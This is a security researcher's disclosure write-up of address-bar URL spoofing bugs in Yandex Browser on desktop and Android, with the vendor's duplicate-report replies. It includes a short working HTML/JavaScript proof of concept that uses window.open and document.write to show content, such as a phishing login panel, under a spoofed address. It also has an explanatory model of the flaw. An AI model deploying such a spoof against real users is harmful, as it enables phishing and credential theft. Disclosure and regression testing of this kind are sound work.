Disclaimer: both vulnerabilities were reported to the Yandex Security Team and considered duplicates, so I was not the first one to discover them.
This issue was reported on 19th July 2016 at 21:36.
By making a user visit a page controlled by the attacker and using the `window.open` and `document.write` functions, it was possible to spoof the URL shown in the address bar.
Workflow:
- Once the page loads, a function is triggered. In my PoC, the function was triggered when a button is clicked.
- The function opens a new window using `window.open`, pointing to the URL that is going to be spoofed.
- By calling `document.write` on that new window, we write a script that calls `document.write` again and writes the content; usually this content will be a phishing login panel.
- My PoC used `document.location` to help them know the real location instead of the one the address bar was showing.
So, the final code would be:
```html
<script>
function spoof() {
  // Open a new window that starts navigating to the URL to be spoofed.
  var nWindow = window.open('https://www.google.com', '_t1');
  // Write into the window before that navigation commits: the spoofed
  // address stays in the bar while attacker-controlled content is shown.
  nWindow.document.write('<pre>Here we could place a phishing login panel</pre>');
}
</script>
<input type="button" onclick="spoof()" value="PoC!">
```
The page was hosted on my server.
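To make the root cause concrete from the browser's side, here is an added model (example code, not the write-up's PoC and not Yandex code) of the address-bar state the PoC exercises; the class and method names are assumptions and the model is deliberately simplified.

```javascript
// Added example, not the original post's code: a small model of the
// address-bar state involved in this bug. Names are invented.
//
// window.open(url) creates a window whose initial document is about:blank
// (same origin as the opener, so the opener may script it); the navigation
// to `url` is only pending until the response commits. Browsers display
// the pending URL early. document.write() on the initial document cancels
// the pending navigation, so the bar must fall back to the committed URL;
// leaving the pending URL on display is what produces the spoof.
class AddressBarModel {
  constructor(resetOnCancel) {
    this.resetOnCancel = resetOnCancel; // false reproduces the buggy behaviour
    this.committedUrl = null;
    this.pendingUrl = null;
    this.displayed = null;
    this.body = '';
  }
  open(url) {
    this.committedUrl = 'about:blank';
    this.pendingUrl = url;
    this.displayed = url; // shown before any byte of `url` has arrived
  }
  // The response for the pending navigation arrived and was committed.
  commit() {
    if (this.pendingUrl === null) return;
    this.committedUrl = this.pendingUrl;
    this.pendingUrl = null;
    this.displayed = this.committedUrl;
  }
  // Opener called nWindow.document.write(html) before commit.
  documentWrite(html) {
    this.body = html;
    this.pendingUrl = null; // pending navigation is discarded
    if (this.resetOnCancel) this.displayed = this.committedUrl;
  }
  isSpoofed() {
    return this.displayed !== this.committedUrl;
  }
}

// Replays the write-up's PoC sequence against the model and reports what
// the user sees versus which document actually holds the content.
function runPoc(resetOnCancel) {
  const bar = new AddressBarModel(resetOnCancel);
  bar.open('https://www.google.com');
  bar.documentWrite('<pre>constructed stand-in for attacker content</pre>');
  return { displayed: bar.displayed, actual: bar.committedUrl, spoofed: bar.isSpoofed() };
}
```

A browser regression test for this class of bug checks the same invariant: after a script writes into a freshly opened window, the displayed URL must equal the URL of the document that actually holds the content.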
Final email about this vulnerability was:
Hello!

Unfortunately the issue had been reported by another researcher before we got your report. We've been working on the fix for several days and it will be rolled out shortly.
Have a nice day!
--
Vasiliy Kuznetsov
Yandex Security Team
This issue was reported on 19th July 2016 at 18:41.
The workflow is exactly the same again.
Before running the PoC:
![ResultMobile1](http://i.imgur.com/jDPQ1mp.jpg)
After running the PoC:
![ResultMobile2](http://i.imgur.com/yOQKHwH.jpg)
Final emails about this vulnerability were:
Hello, Miguel Ángel!

As for Android, I'll check it shortly because it looks similar to one report we got the other day. I'll let you know in a few days.
Have a great weekend!
Hello, Miguel Ángel!

I'm sorry, but the same bug had been reported by another researcher before we'd got your report. That's why we can't offer you a reward.
I hope you've enjoyed this write up.
If you're the one who reported these vulnerabilities before me and you want me to remove this post, please send me a message via Twitter.
Kind regards!